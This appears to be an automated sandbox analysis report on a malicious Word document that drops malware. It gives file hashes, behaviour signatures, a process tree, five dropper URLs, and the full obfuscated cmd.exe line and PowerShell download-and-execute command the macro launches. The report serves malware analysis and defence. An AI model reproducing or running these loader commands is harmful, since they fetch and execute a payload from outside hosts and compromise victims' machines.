Overview

overview

10

Static

static

8

mebmybxq.doc

windows7_x64

10

mebmybxq.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    114s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    11-06-2022 16:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mebmybxq.doc

  • Size

    106KB

  • MD5

    30326e79afdba5026d51ab50b37939d2

  • SHA1

    b4b420c4a464d12f62b94c65aff4ba230c95f3f2

  • SHA256

    403fdb65274fbfeccb8868e0b400f3ee2281426c7dbbdc7bdb263dff0979d704

  • SHA512

    9821a19b0abb1c7ec8f929a47926bdd5a175a006e56e47cba8995cabc1de8c2b04d80b4ace7e7d6227544f58d00efc89f7d569da3bd917d70e42ae1c8dd9e0ce

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://amedion.net/uNMU39B
exe.dropper

http://biciculturabcn.com/6s97jYza
exe.dropper

http://valenetinternet.com.br/3Rdtv
exe.dropper

http://goshowcar.com/9RVqaX
exe.dropper

http://wheelbalancetraining.com/9il

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mebmybxq.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1012
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1180
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd /V:ON/C"set # =wjthMMiMUrvGUsCvwHWNTVrp=/xoau-blS9P:)(7n6y}B;eFz31,d{XkgcY$Dm '\IKf.q@E+R&&for %p in (23,27,16,46,22,13,3,46,32,32,62,59,23,66,48,24,40,46,16,30,27,31,1,46,57,2,62,19,46,2,68,18,46,31,14,32,6,46,40,2,45,59,21,71,67,24,63,3,2,2,23,36,25,25,28,61,46,52,6,27,40,68,40,46,2,25,29,19,7,12,49,34,44,70,3,2,2,23,36,25,25,31,6,57,6,57,29,32,2,29,22,28,31,57,40,68,57,27,61,25,41,13,34,39,1,58,48,28,70,3,2,2,23,36,25,25,15,28,32,46,40,46,2,6,40,2,46,22,40,46,2,68,57,27,61,68,31,22,25,49,73,52,2,15,70,3,2,2,23,36,25,25,56,27,13,3,27,16,57,28,22,68,57,27,61,25,34,73,21,69,28,54,70,3,2,2,23,36,25,25,16,3,46,46,32,31,28,32,28,40,57,46,2,22,28,6,40,6,40,56,68,57,27,61,25,34,6,32,63,68,33,23,32,6,2,38,63,70,63,37,45,59,6,65,54,62,24,62,63,50,41,34,63,45,59,65,35,2,24,59,46,40,15,36,2,46,61,23,72,63,64,63,72,59,6,65,54,72,63,68,46,26,46,63,45,67,27,22,46,28,57,3,38,59,66,16,47,62,6,40,62,59,21,71,67,37,53,2,22,42,53,59,23,66,48,68,60,27,16,40,32,27,28,52,47,6,32,46,38,59,66,16,47,51,62,59,65,35,2,37,45,33,2,28,22,2,30,35,22,27,57,46,13,13,62,59,65,35,2,45,31,22,46,28,55,45,43,57,28,2,57,3,53,43,43,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,80)do set ~ =!~ !!# :~%p,1!&&if %p geq 80 call %~ :*~ !=%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $pKz=new-object Net.WebClient;$VEf='http://amedion.net/uNMU39B@http://biciculturabcn.com/6s97jYza@http://valenetinternet.com.br/3Rdtv@http://goshowcar.com/9RVqaX@http://wheelbalancetraining.com/9il'.Split('@');$iIX = '169';$IPt=$env:temp+'\'+$iIX+'.exe';foreach($KwF in $VEf){try{$pKz.DownloadFile($KwF, $IPt);Start-Process $IPt;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:820

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/820-62-0x0000000000000000-mapping.dmp

      Download

    • memory/820-69-0x000000006B3B0000-0x000000006B95B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/820-68-0x000000006B3B0000-0x000000006B95B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/820-64-0x000000006B3B0000-0x000000006B95B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1012-57-0x0000000076851000-0x0000000076853000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1012-60-0x0000000071ADD000-0x0000000071AE8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1012-54-0x0000000073071000-0x0000000073074000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1012-67-0x0000000071ADD000-0x0000000071AE8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1012-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1012-55-0x0000000070AF1000-0x0000000070AF3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1012-70-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1012-71-0x0000000071ADD000-0x0000000071AE8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1180-59-0x000007FEFC4D1000-0x000007FEFC4D3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1180-58-0x0000000000000000-mapping.dmp

      Download

    • memory/1716-61-0x0000000000000000-mapping.dmp

      Download